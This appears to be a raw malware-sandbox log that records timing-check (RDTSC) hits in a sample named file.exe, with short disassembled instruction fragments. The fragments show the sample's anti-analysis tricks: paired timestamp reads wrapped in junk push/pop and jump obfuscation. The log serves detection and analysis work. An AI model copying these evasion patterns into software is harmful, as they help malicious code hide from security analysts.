Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEE7C7 second address: CEE7E0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F476474B51Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEED34 second address: CEED3E instructions: 0x00000000 rdtsc 0x00000002 js 00007F4764D9CBDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEEE5 second address: CEEEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEEEB second address: CEEEF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF335E second address: CF3362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF3362 second address: CF337D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF337D second address: CF3383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF3383 second address: CF3399 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4764D9CBDBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF36DA second address: CF36FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF36FE second address: CF3702 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF3702 second address: CF3708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF3708 second address: CF371F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4764D9CBD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF371F second address: CF3724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF4F6D second address: CF4F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC8921 second address: BC8925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC8925 second address: BC8933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC8933 second address: BC8952 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F476474B525h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC8952 second address: BC896D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4764D9CBE7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC896D second address: BC8977 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F476474B516h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53604F4 second address: 53604FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53604FA second address: 5360509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F476474B51Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360509 second address: 536050D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536050D second address: 5360539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F476474B524h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F476474B51Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360539 second address: 536053F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536053F second address: 5360549 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 6F6F2693h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360549 second address: 536055B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov si, di 0x0000000f mov ecx, edx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536055B second address: 5360561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53605AF second address: 53605B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53605B5 second address: 5360631 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B51Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F476474B51Eh 0x00000011 jmp 00007F476474B525h 0x00000016 popfd 0x00000017 pushfd 0x00000018 jmp 00007F476474B520h 0x0000001d or eax, 69CF3C98h 0x00000023 jmp 00007F476474B51Bh 0x00000028 popfd 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007F476474B529h 0x00000030 xchg eax, ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360631 second address: 5360635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360635 second address: 536063B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536063B second address: 5360663 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4764D9CBE0h 0x00000009 xor esi, 12DF4158h 0x0000000f jmp 00007F4764D9CBDBh 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360663 second address: 5360679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F476474B51Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360679 second address: 536069F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 mov ax, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4764D9CBE8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0AFA0 second address: C0AFA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0B1F4 second address: C0B1FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360E76 second address: 5360E7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53800E7 second address: 53800EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53800EB second address: 53800EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53800EF second address: 53800F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53800F5 second address: 53801C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 mov ecx, 478A189Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F476474B521h 0x00000013 xchg eax, ecx 0x00000014 jmp 00007F476474B51Eh 0x00000019 xchg eax, ecx 0x0000001a pushad 0x0000001b mov dl, ch 0x0000001d popad 0x0000001e push eax 0x0000001f jmp 00007F476474B51Fh 0x00000024 xchg eax, ecx 0x00000025 pushad 0x00000026 mov di, cx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F476474B51Eh 0x00000030 and al, 00000028h 0x00000033 jmp 00007F476474B51Bh 0x00000038 popfd 0x00000039 call 00007F476474B528h 0x0000003e pop ecx 0x0000003f popad 0x00000040 popad 0x00000041 push dword ptr [ebp+08h] 0x00000044 jmp 00007F476474B521h 0x00000049 lea eax, dword ptr [ebp-08h] 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f pushfd 0x00000050 jmp 00007F476474B523h 0x00000055 sbb ah, 0000007Eh 0x00000058 jmp 00007F476474B529h 0x0000005d popfd 0x0000005e push eax 0x0000005f pop edx 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53801C5 second address: 53801DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov di, cx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53801DD second address: 538021B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B526h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F476474B522h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F476474B51Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538021B second address: 538022F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 5E4A4EE4h 0x00000008 push ebx 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538022F second address: 5380233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380233 second address: 5380237 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380237 second address: 538023D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538023D second address: 5380243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380243 second address: 5380247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380247 second address: 538024B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380384 second address: 5380389 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380389 second address: 53803F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, 3C62h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F4764D9CBE9h 0x00000012 push 00000000h 0x00000014 pushad 0x00000015 mov cl, 35h 0x00000017 mov ebx, 334AC23Ch 0x0000001c popad 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 call 00007F4764D9CBDCh 0x00000027 pop esi 0x00000028 pushfd 0x00000029 jmp 00007F4764D9CBDBh 0x0000002e sub esi, 157AC76Eh 0x00000034 jmp 00007F4764D9CBE9h 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53803F9 second address: 538043B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+1Ch] 0x0000000c jmp 00007F476474B51Eh 0x00000011 push dword ptr [ebp+18h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F476474B527h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538043B second address: 538047E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F4764D9CBDBh 0x0000000b adc ah, FFFFFF8Eh 0x0000000e jmp 00007F4764D9CBE9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push dword ptr [ebp+14h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4764D9CBDDh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538047E second address: 53804C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+10h] 0x0000000c jmp 00007F476474B51Eh 0x00000011 push dword ptr [ebp+0Ch] 0x00000014 jmp 00007F476474B520h 0x00000019 push dword ptr [ebp+08h] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ebx, 30F3C1B0h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53804C5 second address: 53804CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360804 second address: 5360814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F476474B51Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360814 second address: 5360818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360818 second address: 536083F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F476474B529h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536083F second address: 5360843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360843 second address: 5360849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360849 second address: 5360874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 mov ax, 9F95h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 call 00007F4764D9CBE8h 0x00000016 pop eax 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53608B3 second address: 5360911 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 1AAD6C5Bh 0x00000010 pushad 0x00000011 mov cl, 34h 0x00000013 pushfd 0x00000014 jmp 00007F476474B521h 0x00000019 xor ch, 00000046h 0x0000001c jmp 00007F476474B521h 0x00000021 popfd 0x00000022 popad 0x00000023 call 00007F47D41DEC14h 0x00000028 push 74DF27D0h 0x0000002d push dword ptr fs:[00000000h] 0x00000034 mov eax, dword ptr [esp+10h] 0x00000038 mov dword ptr [esp+10h], ebp 0x0000003c lea ebp, dword ptr [esp+10h] 0x00000040 sub esp, eax 0x00000042 push ebx 0x00000043 push esi 0x00000044 push edi 0x00000045 mov eax, dword ptr [74E80140h] 0x0000004a xor dword ptr [ebp-04h], eax 0x0000004d xor eax, ebp 0x0000004f push eax 0x00000050 mov dword ptr [ebp-18h], esp 0x00000053 push dword ptr [ebp-08h] 0x00000056 mov eax, dword ptr [ebp-04h] 0x00000059 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000060 mov dword ptr [ebp-08h], eax 0x00000063 lea eax, dword ptr [ebp-10h] 0x00000066 mov dword ptr fs:[00000000h], eax 0x0000006c ret 0x0000006d pushad 0x0000006e mov al, 43h 0x00000070 mov cl, dl 0x00000072 popad 0x00000073 and dword ptr [ebp-04h], 00000000h 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007F476474B51Ah 0x00000080 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360911 second address: 5360915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360915 second address: 536091B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536091B second address: 5360969 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 mov di, B55Ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edx, dword ptr [ebp+0Ch] 0x00000010 jmp 00007F4764D9CBDBh 0x00000015 mov esi, edx 0x00000017 jmp 00007F4764D9CBE6h 0x0000001c mov al, byte ptr [edx] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F4764D9CBE7h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360969 second address: 53609A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F476474B523h 0x00000012 push ecx 0x00000013 pop ebx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53609A0 second address: 5360969 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 mov ebx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d pushad 0x0000000e jmp 00007F4764D9CBE4h 0x00000013 pushfd 0x00000014 jmp 00007F4764D9CBE2h 0x00000019 jmp 00007F4764D9CBE5h 0x0000001e popfd 0x0000001f popad 0x00000020 jne 00007F4764D9CB32h 0x00000026 mov al, byte ptr [edx] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F4764D9CBE7h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360A0E second address: 5360A1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360A1D second address: 5360A23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360A23 second address: 5360A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360A27 second address: 5360A7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub edx, esi 0x0000000d jmp 00007F4764D9CBDFh 0x00000012 mov edi, dword ptr [ebp+08h] 0x00000015 pushad 0x00000016 mov esi, 6FFAB0EBh 0x0000001b jmp 00007F4764D9CBE0h 0x00000020 popad 0x00000021 dec edi 0x00000022 jmp 00007F4764D9CBE0h 0x00000027 lea ebx, dword ptr [edi+01h] 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360A7D second address: 5360A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360A81 second address: 5360A9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360A9E second address: 5360AF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F476474B527h 0x00000009 sbb cx, 234Eh 0x0000000e jmp 00007F476474B529h 0x00000013 popfd 0x00000014 movzx eax, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov al, byte ptr [edi+01h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F476474B526h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360AF9 second address: 5360AFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360AFF second address: 5360B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360B03 second address: 5360B41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 inc edi 0x00000009 jmp 00007F4764D9CBE9h 0x0000000e test al, al 0x00000010 jmp 00007F4764D9CBDEh 0x00000015 jne 00007F47D4824B20h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360B41 second address: 5360B5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360B5E second address: 5360BD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F4764D9CBE3h 0x0000000b sub ecx, 5EEF362Eh 0x00000011 jmp 00007F4764D9CBE9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ecx, edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push edi 0x00000020 pop eax 0x00000021 pushfd 0x00000022 jmp 00007F4764D9CBDFh 0x00000027 and si, CC3Eh 0x0000002c jmp 00007F4764D9CBE9h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360BD1 second address: 5360C79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F476474B527h 0x00000009 sbb ch, 0000004Eh 0x0000000c jmp 00007F476474B529h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 shr ecx, 02h 0x0000001a pushad 0x0000001b push esi 0x0000001c pushad 0x0000001d popad 0x0000001e pop ebx 0x0000001f popad 0x00000020 rep movsd 0x00000022 rep movsd 0x00000024 rep movsd 0x00000026 rep movsd 0x00000028 rep movsd 0x0000002a pushad 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F476474B51Dh 0x00000032 add cl, 00000036h 0x00000035 jmp 00007F476474B521h 0x0000003a popfd 0x0000003b popad 0x0000003c push ebx 0x0000003d mov dx, si 0x00000040 pop esi 0x00000041 popad 0x00000042 mov ecx, edx 0x00000044 jmp 00007F476474B525h 0x00000049 and ecx, 03h 0x0000004c pushad 0x0000004d movzx eax, dx 0x00000050 popad 0x00000051 rep movsb 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F476474B521h 0x0000005a rdtsc
